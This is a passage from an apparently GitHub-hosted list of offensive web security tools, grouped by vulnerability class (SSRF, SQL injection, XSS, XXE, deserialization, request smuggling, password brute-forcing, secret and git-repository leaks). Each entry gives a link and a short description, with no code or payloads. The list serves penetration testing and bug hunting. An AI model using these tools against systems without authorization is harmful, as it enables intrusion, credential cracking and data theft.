<h3 dir="auto"><a id="user-content-header-injection" class="anchor" aria-hidden="true" href="header-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Header Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/mlcsec/headi">headi</a> - Customisable and automated HTTP header injection.</li>
<li><a href="https://github.com/topics/host-header-injection">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-insecure-deserialization" class="anchor" aria-hidden="true" href="insecure-deserialization"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Insecure Deserialization</h3>
<ul dir="auto">
<li><a href="https://github.com/frohoff/ysoserial">ysoserial</a> - A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.</li>
<li><a href="https://github.com/BishopFox/GadgetProbe">GadgetProbe</a> - Probe endpoints consuming Java serialized objects to identify classes, libraries, and library versions on remote Java classpaths.</li>
<li><a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a> - Deserialization payload generator for a variety of .NET formatters</li>
<li><a href="https://github.com/ambionics/phpggc">phpggc</a> - PHPGGC is a library of PHP unserialize() payloads along with a tool to generate them, from command line or programmatically.</li>
<li><a href="https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-insecure-direct-object-references" class="anchor" aria-hidden="true" href="insecure-direct-object-references"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Insecure Direct Object References</h3>
<ul dir="auto">
<li><a href="https://github.com/Quitten/Autorize">Autorize</a> - Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily</li>
<li><a href="https://github.com/topics/idor">for more tools</a> </li>
</ul>
<h3 dir="auto"><a id="user-content-open-redirect" class="anchor" aria-hidden="true" href="open-redirect"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Open Redirect</h3>
<ul dir="auto">
<li><a href="https://github.com/r0075h3ll/Oralyzer">Oralyzer</a> - Open Redirection Analyzer</li>
<li><a href="https://github.com/BountyStrike/Injectus">Injectus</a> - CRLF and open redirect fuzzer</li>
<li><a href="https://github.com/Naategh/dom-red">dom-red</a> - Small script to check a list of domains against open redirect vulnerability</li>
<li><a href="https://github.com/devanshbatham/OpenRedireX">OpenRedireX</a> - A Fuzzer for OpenRedirect issues</li>
<li><a href="https://github.com/topics/open-redirect">for more tools </a> </li>
</ul>
<h3 dir="auto"><a id="user-content-race-condition" class="anchor" aria-hidden="true" href="race-condition"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Race Condition</h3>
<ul dir="auto">
<li><a href="https://github.com/compsec-snu/razzer">razzer</a> - A Kernel fuzzer focusing on race bugs</li>
<li><a href="https://github.com/racepwn/racepwn">racepwn</a> - Race Condition framework</li>
<li><a href="https://github.com/nccgroup/requests-racer">requests-racer</a> - Small Python library that makes it easy to exploit race conditions in web apps with Requests.</li>
<li><a href="https://github.com/PortSwigger/turbo-intruder">turbo-intruder</a> - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.</li>
<li><a href="https://github.com/TheHackerDev/race-the-web">race-the-web</a> - Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.</li>
<li><a href="https://github.com/topics/race-conditions">for more tools </a> </li>
</ul>
<h3 dir="auto"><a id="user-content-request-smuggling" class="anchor" aria-hidden="true" href="request-smuggling"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Request Smuggling</h3>
<ul dir="auto">
<li><a href="https://github.com/anshumanpattnaik/http-request-smuggling">http-request-smuggling</a> - HTTP Request Smuggling Detection Tool</li>
<li><a href="https://github.com/defparam/smuggler">smuggler</a> - Smuggler - An HTTP Request Smuggling / Desync testing tool written in Python 3</li>
<li><a href="https://github.com/BishopFox/h2csmuggler">h2csmuggler</a> - HTTP Request Smuggling over HTTP/2 Cleartext (h2c)</li>
<li><a href="https://github.com/defparam/tiscripts">tiscripts</a> - These scripts I use to create Request Smuggling Desync payloads for CLTE and TECL style attacks.</li>
<li><a href="https://github.com/PortSwigger/http-request-smuggler">HTTP Request Smuggler</a>PortSwigger </li>
</ul>
<h3 dir="auto"><a id="user-content-server-side-request-forgery" class="anchor" aria-hidden="true" href="server-side-request-forgery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Server Side Request Forgery</h3>
<ul dir="auto">
<li><a href="https://github.com/swisskyrepo/SSRFmap">SSRFmap</a> - Automatic SSRF fuzzer and exploitation tool</li>
<li><a href="https://github.com/tarunkant/Gopherus">Gopherus</a> - This tool generates gopher link for exploiting SSRF and gaining RCE in various servers</li>
<li><a href="https://github.com/jobertabma/ground-control">ground-control</a> - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.</li>
<li><a href="https://github.com/micha3lb3n/SSRFire">SSRFire</a> - An automated SSRF finder. Just give the domain name and your server and chill! ;) Also has options to find XSS and open redirects</li>
<li><a href="https://github.com/daeken/httprebind">httprebind</a> - Automatic tool for DNS rebinding-based SSRF attacks</li>
<li><a href="https://github.com/teknogeek/ssrf-sheriff">ssrf-sheriff</a> - A simple SSRF-testing sheriff written in Go</li>
<li><a href="https://github.com/SpiderMate/B-XSSRF">B-XSSRF</a> - Toolkit to detect and keep track on Blind XSS, XXE & SSRF</li>
<li><a href="https://github.com/Damian89/extended-ssrf-search">extended-ssrf-search</a> - Smart ssrf scanner using different methods like parameter brute forcing in post and get...</li>
<li><a href="https://github.com/KathanP19/gaussrf">gaussrf</a> - Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl and Filter Urls With OpenRedirection or SSRF Parameters.</li>
<li><a href="https://github.com/JacobReynolds/ssrfDetector">ssrfDetector</a> - Server-side request forgery detector</li>
<li><a href="https://github.com/RandomRobbieBF/grafana-ssrf">grafana-ssrf</a> - Authenticated SSRF in Grafana</li>
<li><a href="https://github.com/xawdxawdx/sentrySSRF">sentrySSRF</a> - Tool to searching sentry config on page or in javascript files and check blind SSRF</li>
<li><a href="https://github.com/knassar702/lorsrf">lorsrf</a> - Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods</li>
<li><a href="https://github.com/nccgroup/singularity">singularity</a> - A DNS rebinding attack framework.</li>
<li><a href="https://github.com/brannondorsey/whonow">whonow</a> - A "malicious" DNS server for executing DNS Rebinding attacks on the fly (public instance running on rebind.network:53)</li>
<li><a href="https://github.com/brannondorsey/dns-rebind-toolkit">dns-rebind-toolkit</a> - A front-end JavaScript toolkit for creating DNS rebinding attacks.</li>
<li><a href="https://github.com/FSecureLABS/dref">dref</a> - DNS Rebinding Exploitation Framework</li>
<li><a href="https://github.com/taviso/rbndr">rbndr</a> - Simple DNS Rebinding Service</li>
<li><a href="https://github.com/daeken/httprebind">httprebind</a> - Automatic tool for DNS rebinding-based SSRF attacks</li>
</ul>
<h3 dir="auto"><a id="user-content-sql-injection" class="anchor" aria-hidden="true" href="sql-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>SQL Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/sqlmapproject/sqlmap">sqlmap</a> - Automatic SQL injection and database takeover tool</li>
<li><a href="https://github.com/codingo/NoSQLMap">NoSQLMap</a> - Automated NoSQL database enumeration and web application exploitation tool.</li>
<li><a href="https://github.com/0xbug/SQLiScanner">SQLiScanner</a> - Automatic SQL injection with Charles and sqlmap api</li>
<li><a href="https://github.com/RhinoSecurityLabs/SleuthQL">SleuthQL</a> - Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap.</li>
<li><a href="https://github.com/blackarrowsec/mssqlproxy">mssqlproxy</a> - mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse</li>
<li><a href="https://github.com/zt2/sqli-hunter">sqli-hunter</a> - SQLi-Hunter is a simple HTTP / HTTPS proxy server and a SQLMAP API wrapper that makes digging SQLi easy.</li>
<li><a href="https://github.com/ghostlulzhacks/waybackSqliScanner">waybackSqliScanner</a> - Gather urls from wayback machine then test each GET parameter for sql injection.</li>
<li><a href="https://github.com/NetSPI/ESC">ESC</a> - Evil SQL Client (ESC) is an interactive .NET SQL console client with enhanced SQL Server discovery, access, and data exfiltration features.</li>
<li><a href="https://github.com/Keramas/mssqli-duet">mssqli-duet</a> - SQL injection script for MSSQL that extracts domain users from an Active Directory environment based on RID bruteforcing</li>
<li><a href="https://github.com/Miladkhoshdel/burp-to-sqlmap">burp-to-sqlmap</a> - Performing SQLInjection test on Burp Suite Bulk Requests using SQLMap</li>
<li><a href="https://github.com/InitRoot/BurpSQLTruncSanner">BurpSQLTruncSanner</a> - Messy BurpSuite plugin for SQL Truncation vulnerabilities.</li>
<li><a href="https://github.com/sadicann/andor">andor</a> - Blind SQL Injection Tool with Golang</li>
<li><a href="https://github.com/mhaskar/Blinder">Blinder</a> - A python library to automate time-based blind SQL injection</li>
<li><a href="https://github.com/the-robot/sqliv">sqliv</a> - massive SQL injection vulnerability scanner</li>
<li><a href="https://github.com/Charlie-belmer/nosqli">nosqli</a> - NoSql Injection CLI tool, for finding vulnerable websites using MongoDB.</li>
</ul>
<h3 dir="auto"><a id="user-content-xss-injection" class="anchor" aria-hidden="true" href="xss-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>XSS Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/s0md3v/XSStrike">XSStrike</a> - Most advanced XSS scanner.</li>
<li><a href="https://github.com/evilcos/xssor2">xssor2</a> - XSS'OR - Hack with JavaScript.</li>
<li><a href="https://github.com/DanMcInerney/xsscrapy">xsscrapy</a> - XSS spider - 66/66 wavsep XSS detected</li>
<li><a href="https://github.com/Netflix-Skunkworks/sleepy-puppy">sleepy-puppy</a> - Sleepy Puppy XSS Payload Management Framework</li>
<li><a href="https://github.com/ssl/ezXSS">ezXSS</a> - ezXSS is an easy way for penetration testers and bug bounty hunters to test (blind) Cross Site Scripting.</li>
<li><a href="https://github.com/mandatoryprogrammer/xsshunter">xsshunter</a> - The XSS Hunter service - a portable version of XSSHunter.com</li>
<li><a href="https://github.com/hahwul/dalfox">dalfox</a> - DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang</li>
<li><a href="https://github.com/epsylon/xsser">xsser</a> - Cross Site "Scripter" (aka XSSer) is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.</li>
<li><a href="https://github.com/hahwul/XSpear">XSpear</a> - Powerfull XSS Scanning and Parameter analysis tool&gem</li>
<li><a href="https://github.com/hakluke/weaponised-XSS-payloads">weaponised-XSS-payloads</a> - XSS payloads designed to turn alert(1) into P1</li>
<li><a href="https://github.com/nccgroup/tracy">tracy</a> - A tool designed to assist with finding all sinks and sources of a web application and display these results in a digestible manner.</li>
<li><a href="https://github.com/jobertabma/ground-control">ground-control</a> - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.</li>
<li><a href="https://github.com/nVisium/xssValidator">xssValidator</a> - This is a burp intruder extender that is designed for automation and validation of XSS vulnerabilities.</li>
<li><a href="https://github.com/Den1al/JSShell">JSShell</a> - An interactive multi-user web JS shell</li>
<li><a href="https://github.com/LewisArdern/bXSS">bXSS</a> - bXSS is a utility which can be used by bug hunters and organizations to identify Blind Cross-Site Scripting.</li>
<li><a href="https://github.com/whitel1st/docem">docem</a> - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)</li>
<li><a href="https://github.com/bugbountyforum/XSS-Radar">XSS-Radar</a> - XSS Radar is a tool that detects parameters and fuzzes them for cross-site scripting vulnerabilities.</li>
<li><a href="https://github.com/rajeshmajumdar/BruteXSS">BruteXSS</a> - BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application.</li>
<li><a href="https://github.com/dwisiswant0/findom-xss">findom-xss</a> - A fast DOM based XSS vulnerability scanner with simplicity.</li>
<li><a href="https://github.com/fcavallarin/domdig">domdig</a> - DOM XSS scanner for Single Page Applications</li>
<li><a href="https://github.com/wish-i-was/femida">femida</a> - Automated blind-xss search for Burp Suite</li>
<li><a href="https://github.com/SpiderMate/B-XSSRF">B-XSSRF</a> - Toolkit to detect and keep track on Blind XSS, XXE & SSRF</li>
<li><a href="https://github.com/yaph/domxssscanner">domxssscanner</a> - DOMXSS Scanner is an online tool to scan source code for DOM based XSS vulnerabilities</li>
<li><a href="https://github.com/mandatoryprogrammer/xsshunter_client">xsshunter_client</a> - Correlated injection proxy tool for XSS Hunter</li>
<li><a href="https://github.com/Damian89/extended-xss-search">extended-xss-search</a> - A better version of my xssfinder tool - scans for different types of xss on a list of urls.</li>
<li><a href="https://github.com/Jewel591/xssmap">xssmap</a> - XSSMap 是一款基于 Python3 开发用于检测 XSS 漏洞的工具</li>
<li><a href="https://github.com/menkrep1337/XSSCon">XSSCon</a> - XSSCon: Simple XSS Scanner tool</li>
<li><a href="https://github.com/BitTheByte/BitBlinder">BitBlinder</a> - BurpSuite extension to inject custom cross-site scripting payloads on every form/request submitted to detect blind XSS vulnerabilities</li>
<li><a href="https://github.com/dxa4481/XSSOauthPersistence">XSSOauthPersistence</a> - Maintaining account persistence via XSS and Oauth</li>
<li><a href="https://github.com/shadow-workers/shadow-workers">shadow-workers</a> - Shadow Workers is a free and open source C2 and proxy designed for penetration testers to help in the exploitation of XSS and malicious Service Workers (SW)</li>
<li><a href="https://github.com/profmoriarity/rexsser">rexsser</a> - This is a burp plugin that extracts keywords from response using regexes and test for reflected XSS on the target scope.</li>
<li><a href="https://github.com/EgeBalci/xss-flare">xss-flare</a> - XSS hunter on cloudflare serverless workers.</li>
<li><a href="https://github.com/jiangsir404/Xss-Sql-Fuzz">Xss-Sql-Fuzz</a> - burpsuite 插件对GP所有参数(过滤特殊参数)一键自动添加xss sql payload 进行fuzz</li>
<li><a href="https://github.com/hipotermia/vaya-ciego-nen">vaya-ciego-nen</a> - Detect, manage and exploit Blind Cross-site scripting (XSS) vulnerabilities.</li>
<li><a href="https://github.com/AsaiKen/dom-based-xss-finder">dom-based-xss-finder</a> - Chrome extension that finds DOM based XSS vulnerabilities</li>
<li><a href="https://github.com/machinexa2/XSSTerminal">XSSTerminal</a> - Develop your own XSS Payload using interactive typing</li>
<li><a href="https://github.com/vavkamil/xss2png">xss2png</a> - PNG IDAT chunks XSS payload generator</li>
<li><a href="https://github.com/vavkamil/XSSwagger">XSSwagger</a> - A simple Swagger-ui scanner that can detect old versions vulnerable to various XSS attacks</li>
</ul>
<h3 dir="auto"><a id="user-content-xxe-injection" class="anchor" aria-hidden="true" href="xxe-injection"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>XXE Injection</h3>
<ul dir="auto">
<li><a href="https://github.com/jobertabma/ground-control">ground-control</a> - A collection of scripts that run on my web server. Mainly for debugging SSRF, blind XSS, and XXE vulnerabilities.</li>
<li><a href="https://github.com/GoSecure/dtd-finder">dtd-finder</a> - List DTDs and generate XXE payloads using those local DTDs.</li>
<li><a href="https://github.com/whitel1st/docem">docem</a> - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc (OXML_XEE on steroids)</li>
<li><a href="https://github.com/staaldraad/xxeserv">xxeserv</a> - A mini webserver with FTP support for XXE payloads</li>
<li><a href="https://github.com/luisfontes19/xxexploiter">xxexploiter</a> - Tool to help exploit XXE vulnerabilities</li>
<li><a href="https://github.com/SpiderMate/B-XSSRF">B-XSSRF</a> - Toolkit to detect and keep track on Blind XSS, XXE & SSRF</li>
<li><a href="https://github.com/enjoiz/XXEinjector">XXEinjector</a> - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.</li>
<li><a href="https://github.com/BuffaloWill/oxml_xxe">oxml_xxe</a> - A tool for embedding XXE/XML exploits into different filetypes</li>
<li><a href="https://github.com/vp777/metahttp">metahttp</a> - A bash script that automates the scanning of a target network for HTTP resources through XXE</li>
</ul>
<hr>
<h2 dir="auto"><a id="user-content-miscellaneous" class="anchor" aria-hidden="true" href="miscellaneous"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Miscellaneous</h2>
<h3 dir="auto"><a id="user-content-passwords" class="anchor" aria-hidden="true" href="passwords"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Passwords</h3>
<ul dir="auto">
<li><a href="https://github.com/vanhauser-thc/thc-hydra">thc-hydra</a> - Hydra is a parallelized login cracker which supports numerous protocols to attack.</li>
<li><a href="https://github.com/ihebski/DefaultCreds-cheat-sheet">DefaultCreds-cheat-sheet</a> - One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password</li>
<li><a href="https://github.com/ztgrace/changeme">changeme</a> - A default credential scanner.</li>
<li><a href="https://github.com/1N3/BruteX">BruteX</a> - Automatically brute force all services running on a target.</li>
<li><a href="https://github.com/lanjelot/patator">patator</a> - Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage.</li>
</ul>
<h3 dir="auto"><a id="user-content-secrets" class="anchor" aria-hidden="true" href="secrets"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Secrets</h3>
<ul dir="auto">
<li><a href="https://github.com/awslabs/git-secrets">git-secrets</a> - Prevents you from committing secrets and credentials into git repositories</li>
<li><a href="https://github.com/zricethezav/gitleaks">gitleaks</a> - Scan git repos (or files) for secrets using regex and entropy</li>
<li><a href="https://github.com/dxa4481/truffleHog">truffleHog</a> - Searches through git repositories for high entropy strings and secrets, digging deep into commit history</li>
<li><a href="https://github.com/hisxo/gitGraber">gitGraber</a> - gitGraber: monitor GitHub to search and find sensitive data in real time for different online services</li>
<li><a href="https://github.com/thoughtworks/talisman">talisman</a> - By hooking into the pre-push hook provided by Git, Talisman validates the outgoing changeset for things that look suspicious - such as authorization tokens and private keys.</li>
<li><a href="https://github.com/BishopFox/GitGot">GitGot</a> - Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.</li>
<li><a href="https://github.com/anshumanbh/git-all-secrets">git-all-secrets</a> - A tool to capture all the git secrets by leveraging multiple open source git searching tools</li>
<li><a href="https://github.com/gwen001/github-search">github-search</a> - Tools to perform basic search on GitHub.</li>
<li><a href="https://github.com/cve-search/git-vuln-finder">git-vuln-finder</a> - Finding potential software vulnerabilities from git commit messages</li>
<li><a href="https://github.com/x1sec/commit-stream">commit-stream</a> - OSINT tool for finding Github repositories by extracting commit logs in real time from the Github event API</li>
<li><a href="https://github.com/michenriksen/gitrob">gitrob</a> - Reconnaissance tool for GitHub organizations</li>
<li><a href="https://github.com/auth0/repo-supervisor">repo-supervisor</a> - Scan your code for security misconfiguration, search for passwords and secrets.</li>
<li><a href="https://github.com/UnkL4b/GitMiner">GitMiner</a> - Tool for advanced mining for content on Github</li>
<li><a href="https://github.com/eth0izzle/shhgit">shhgit</a> - Ah shhgit! Find GitHub secrets in real time</li>
<li><a href="https://github.com/Yelp/detect-secrets">detect-secrets</a> - An enterprise friendly way of detecting and preventing secrets in code.</li>
<li><a href="https://github.com/newrelic/rusty-hog">rusty-hog</a> - A suite of secret scanners built in Rust for performance. Based on TruffleHog</li>
<li><a href="https://github.com/Skyscanner/whispers">whispers</a> - Identify hardcoded secrets and dangerous behaviours</li>
<li><a href="https://github.com/nielsing/yar">yar</a> - Yar is a tool for plunderin' organizations, users and/or repositories.</li>
<li><a href="https://github.com/BishopFox/dufflebag">dufflebag</a> - Search exposed EBS volumes for secrets</li>
<li><a href="https://github.com/duo-labs/secret-bridge">secret-bridge</a> - Monitors Github for leaked secrets</li>
<li><a href="https://github.com/americanexpress/earlybird">earlybird</a> - EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.</li>
<li><a href="https://github.com/trufflesecurity/Trufflehog-Chrome-Extension">Trufflehog-Chrome-Extension</a> - Trufflehog-Chrome-Extension</li>
</ul>
<h3 dir="auto"><a id="user-content-git" class="anchor" aria-hidden="true" href="git"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a>Git</h3>
<ul dir="auto">
<li><a href="https://github.com/internetwache/GitTools">GitTools</a> - A repository with 3 tools for pwn'ing websites with .git repositories available</li>
<li><a href="https://github.com/liamg/gitjacker">gitjacker</a> - Leak git repositories from misconfigured websites</li>
<li><a href="https://github.com/arthaud/git-dumper">git-dumper</a> - A tool to dump a git repository from a website</li>
<li><a href="https://github.com/digininja/GitHunter">GitHunter</a> - A tool for searching a Git repository for interesting content</li>
<li><a href="https://github.com/kost/dvcs-ripper">dvcs-ripper</a> - Rip web accessible (distributed) version control systems: SVN/GIT/HG...</li>
